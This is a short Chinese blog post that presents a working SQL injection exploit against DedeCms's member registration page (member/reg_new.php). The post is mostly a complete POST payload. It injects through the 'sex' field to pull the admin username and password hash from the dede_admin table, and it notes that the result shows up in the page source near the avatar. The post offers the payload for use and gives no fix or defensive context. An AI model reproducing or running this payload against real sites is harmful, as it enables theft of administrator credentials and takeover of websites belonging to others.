当前位置: 首页 > PHP, 漏洞列表, 编程语言 > 正文

DedeCms SQL最新注射漏洞

member/reg_new.php
POST dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA

&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r

&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss

&email=sss%40ss.ss&safequestion=0&safeanswer=

&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd)

from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
查看源代码,头像那里就有可以利用的东西了。


本文固定链接: http://www.chnpanda.com/535.html | 熊猫博客 | 转载请注明出处,谢谢合作!

本文关键字: ,

DedeCms SQL最新注射漏洞:等您坐沙发呢!

发表评论

亲,不支持纯字母、符号评论哦~